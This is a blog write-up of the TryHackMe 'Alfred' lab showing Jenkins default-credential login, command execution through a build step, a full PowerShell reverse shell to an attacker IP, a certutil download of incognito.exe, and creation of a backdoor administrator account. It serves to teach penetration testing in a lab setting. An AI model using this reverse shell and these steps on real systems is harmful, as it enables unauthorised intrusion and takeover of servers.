You dont have javascript enabled! Please enable it!

Alfred – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 22, 2021

Intro

We’ll exploit a common misconfiguration on a widely used automation server (Jenkins) and gain access through windows tokens.

 

Enumeration

 

Nmap scan

  ┌──(kali㉿kali)-[~]      └─$ export IP=10.10.117.45   ┌──(kali㉿kali)-[~]      └─$ nmap -p- -A -Pn -v $IP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site doesn't have a title (text/html). 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=alfred | Issuer: commonName=alfred | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-10-02T14:42:05 | Not valid after: 2021-04-03T14:42:05 | MD5: fdb2 cd17 fad1 160d 06bc c1d8 31f3 7636 |_SHA-1: 6577 409f 2b1a 3e36 7ca7 4449 57f2 98c1 8750 3a3e |_ssl-date: 2021-02-06T18:18:26+00:00; -1s from scanner time. 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8).

Nothing interesting on port 80, an open RDP port on 3389 and another http web server on port 8080 with a login form. Trying to login with admin:admin succeeds.

Exploitation

Remote Code Execution

After checking out the tool, I found a way to execute commands on the underlying system:

1. Click on “project” on the start page:

 

2. “Configure” on the left side:

 

2.1 Configure your reverse shell script, start a listener & http server:

  ┌──(kali㉿kali)-[~]      └─$ cat revsh.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.8.152.223',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();   ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443   ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300

 

3. Scroll down and enter your command in the “Command” field & Save:

 

4. After clicking on “Build”, you should get a reverse shell:

listening on [any] 443 ... connect to [10.8.152.221] from (UNKNOWN) [10.10.117.45] 50077 PS C:\Program Files (x86)\Jenkins\workspace\project> whoami alfred\bruce PS C:\Program Files (x86)\Jenkins\workspace\project>

Privilege Escalation

PS > whoami /priv
PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeDebugPrivilege Debug programs Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled

SeDebugPrivilege & SeCreateGlobalPrivilege are enabled for bruce. These tokens will enable us to impersonate another user or even create one and assign it with administrative privileges.

 

We’ll need to download a binary called incognito.exe to get this to work. We can afterwards transfer it from a local http server.

  ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300
PS > certutil.exe -urlcache -split -f "http://10.8.152.221:5300/incognito.exe" incognito.exe

Now that we’ve downloaded the binary to the target machine, we can use it to add a user. 

PS > ./incognito.exe add_user nextdoorsec passwordd
PS > ./incognito.exe add_localgroup_user Administrators nextdoorsec   ┌──(kali㉿kali)-[~]      └─$ rdesktop -u nextdoorsec -p passwordd $IP

We’ve added a user named “nextdoorsec” with a password “passwordd” and afterwards assigned it to the “Administrators” group. To test it out, you can connect to the open RDP port.

author bio

Author bio

Hi there, my name is Aydan, and I share exciting information about cyber security and ethical hacking, a.k.a pen-testing.

Other interesting articles

Winter Vivern: “The Latest Cyber Threat Targeting European Governments”

Winter Vivern: “The Latest Cyber Threat Targeting European Governments”

Winter Vivern, an advanced persistent threat (APT) actor, has expanded its cyber espionage campaign by targeting ...
“MacStealer Malware Strikes: iCloud Keychain Data and Passwords at Risk for Apple Users”

“MacStealer Malware Strikes: iCloud Keychain Data and Passwords at Risk for Apple Users”

A new type of macOS malware called MacStealer has been discovered, capable of stealing iCloud Keychain data and ...
Cybersecurity Automation: Empowering Your Cyber Defense

Cybersecurity Automation: Empowering Your Cyber Defense

In today's digital age, cybersecurity is a top priority for organizations of all sizes and industries. As cyber ...
Will Cybersecurity Be Automated?

Will Cybersecurity Be Automated?

In recent years, there has been a growing trend toward automation in many industries, including cybersecurity. The ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

error: Alert: Content is protected !!